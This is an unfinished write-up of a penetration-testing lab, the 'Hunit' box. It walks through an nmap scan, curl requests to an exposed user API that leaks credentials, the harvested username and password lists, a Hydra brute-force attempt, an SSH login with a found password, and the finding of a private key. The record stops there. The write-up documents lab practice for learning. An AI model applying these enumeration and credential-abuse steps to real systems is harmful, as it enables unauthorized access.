> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/to-do/hunit.md).

# Hunit (WIP)

## Nmap

```
sudo nmap   192.168.79.125 -p- -sS -sV

Not shown: 65531 filtered ports
PORT      STATE SERVICE    VERSION
8080/tcp  open  http-proxy
12445/tcp open  unknown
18030/tcp open  http       Apache httpd 2.4.46 ((Unix))
43022/tcp open  ssh        OpenSSH 8.4 (protocol 2.0)
```

Browsing to port 8080 takes us to a web page for haikus.

![](/files/-MY-hBEXrJLiuTZKW5SR)

We can individually browse to each haiku.

![](/files/-MY-hPzVjlikn7gpffR0)

Checking the source page for any haiku reveals a comment refer to API.

![](/files/-MY-hVX5JSwxJueNXXMl)

Running curl against the API reveals further information

```
curl http://192.168.79.125:8080/api/
```

![](/files/-MY-hlBLcwS3ZRgNeylO)

Runnining curl against the user API directory reveals sensitive information regarding each user.

```
curl http://192.168.79.125:8080/api/user/
```

![](/files/-MY-i4LFkGPH62zWgHzr)

Compiling the passwords and login names of each provides us with a users and password list.

{% tabs %}
{% tab title="Users" %}

```
rjackson
dademola
jvargas
jsanchez
```

{% endtab %}
{% endtabs %}

{% tabs %}
{% tab title="Passwords" %}

```
yYJcgYqszv4aGQ
ExplainSlowQuest110
KTuGcSW6Zxwd0Q
d52cQ1BzyNQycg
OuQ96hcgiM5o9w
```

{% endtab %}
{% endtabs %}

I then tried bruteforcing this with Hydra and was unable to get a result.

![](/files/-MY-lq1QvqvFAdRD30bG)

Inspecting our found information further we find that all the users are 'Editors' and David is a admin. The password associated with David is also greatly different from the rest. I then tried a manual login with SSH.

```
ssh -p 43022 dademola@192.168.79.125
```

Valid credentials: `dademola:ExplainSlowQuest110`

![](/files/-MY-ma6qHLQrEt_BF3Js)

Looking for other users in /home/ we see we have the Git user. Checking contents of the directory we also have a id\_rsa key.

![](/files/-MY-qW52YDQHklKYjWA7)
